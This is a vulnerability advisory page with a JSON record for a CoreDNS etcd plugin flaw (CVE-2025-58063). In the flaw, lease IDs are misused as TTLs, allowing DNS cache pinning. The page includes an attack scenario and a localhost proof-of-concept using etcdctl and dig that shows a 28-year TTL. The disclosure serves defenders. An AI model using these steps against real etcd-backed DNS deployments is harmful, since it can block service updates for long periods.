ghsa-93mf-426m-g6x9
Vulnerability from github
Published
2025-09-09 19:19
Modified
2025-09-10 21:07
Summary
CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion
Details

Summary

The CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.

Details

In plugin/etcd/etcd.go, the TTL() function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:

go func (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 { etcdTTL := uint32(kv.Lease) // BUG: Lease ID != TTL duration // ... rest of function uses etcdTTL as actual TTL }

Lease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.

This enables cache pinning attacks, such as:

  1. Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).
  2. Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).
  3. CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.
  4. Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.

Some resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.

PoC

  1. Launch etcd:

bash etcd \ --data-dir ./etcd-data \ --listen-client-urls http://127.0.0.1:2379 \ --advertise-client-urls http://127.0.0.1:2379 \ --listen-peer-urls http://127.0.0.1:2380 \ --initial-advertise-peer-urls http://127.0.0.1:2380 \ --initial-cluster default=http://127.0.0.1:2380 \ --name default \ --initial-cluster-token etcd-ttl-poc \ --initial-cluster-state new &

  1. Prepare CoreDNS configuration:

bash cat > Corefile << 'EOF' skydns.local { etcd { path /skydns endpoint http://localhost:2379 debug } log errors } EOF

  1. Launch CoreDNS:

bash coredns -conf Corefile -dns.port=1053

  1. Create an etcd record called large-lease-service with a lease grant of 1 hour:

```bash LEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk '{print $2}')

etcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service '{ "host": "192.168.1.101", "port": 8080 }' --lease=$LEASE_ID ```

  1. Verify the lease details:

bash $ etcdctl lease timetolive $LEASE_ID lease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)

  1. Query the DNS record and observe the record TTL at 28 years:

bash $ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A large-lease-service.skydns.local. 901209123 IN A 192.168.1.101

Impact

Affects any CoreDNS deployment using the etcd plugin for service discovery.

  • Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.
  • Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)
  • Confidentiality: None.

The bug was introduced in #1702 as part of the CoreDNS v1.2.0 release.

Mitigation

The TTL function should utilise etcd's Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.

Credit

Thanks to @thevilledev for disclovering this vulnerability and contributing a fix.

For more information

Please consult our security guide for more information regarding our security process.

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/coredns/coredns"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.0"
            },
            {
              "fixed": "1.12.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58063"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-681"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-09T19:19:33Z",
    "nvd_published_at": "2025-09-09T20:15:48Z",
    "severity": "HIGH"
  },
  "details": "# Summary\n\nThe CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.\n\n# Details\n\nIn `plugin/etcd/etcd.go`, the `TTL()` function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:\n\n```go\nfunc (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 {\n    etcdTTL := uint32(kv.Lease)  // BUG: Lease ID != TTL duration\n    // ... rest of function uses etcdTTL as actual TTL\n}\n```\n\nLease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.\n\nThis enables cache pinning attacks, such as:\n\n1. Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).\n2. Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).\n4. CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.\n5. Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.\n\nSome resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.\n\n# PoC\n\n1. Launch etcd:\n\n```bash\netcd \\\n  --data-dir ./etcd-data \\\n  --listen-client-urls http://127.0.0.1:2379 \\\n  --advertise-client-urls http://127.0.0.1:2379 \\\n  --listen-peer-urls http://127.0.0.1:2380 \\\n  --initial-advertise-peer-urls http://127.0.0.1:2380 \\\n  --initial-cluster default=http://127.0.0.1:2380 \\\n  --name default \\\n  --initial-cluster-token etcd-ttl-poc \\\n  --initial-cluster-state new \u0026\n```\n\n2. Prepare CoreDNS configuration:\n\n```bash\ncat \u003e Corefile \u003c\u003c \u0027EOF\u0027\nskydns.local {\n    etcd {\n        path /skydns\n        endpoint http://localhost:2379\n        debug\n    }\n    log\n    errors\n}\nEOF\n```\n\n3. Launch CoreDNS:\n\n```bash\ncoredns -conf Corefile -dns.port=1053\n```\n\n4. Create an etcd record called `large-lease-service` with a lease grant of 1 hour:\n\n```bash\nLEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk \u0027{print $2}\u0027)\n\netcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service \u0027{\n  \"host\": \"192.168.1.101\",\n  \"port\": 8080\n}\u0027 --lease=$LEASE_ID\n```\n\n7. Verify the lease details:\n\n```bash\n$ etcdctl lease timetolive $LEASE_ID\nlease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)\n```\n\n8. Query the DNS record and observe the record TTL at 28 years:\n\n```bash\n$ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A\nlarge-lease-service.skydns.local. 901209123 IN A 192.168.1.101\n```\n\n# Impact\n\nAffects any CoreDNS deployment using the etcd plugin for service discovery.\n\n- Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.\n- Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)\n- Confidentiality: None.\n\nThe bug was introduced in #1702 as part of the CoreDNS [v1.2.0 release](https://github.com/coredns/coredns/releases/tag/v1.2.0).\n\n# Mitigation\n\nThe TTL function should utilise etcd\u0027s Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.\n\n# Credit\n\nThanks to [@thevilledev](https://github.com/thevilledev) for disclovering this vulnerability and contributing a fix.\n\n# For more information\n\nPlease consult our [security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.",
  "id": "GHSA-93mf-426m-g6x9",
  "modified": "2025-09-10T21:07:40Z",
  "published": "2025-09-09T19:19:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58063"
    },
    {
      "type": "WEB",
      "url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/coredns/coredns"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…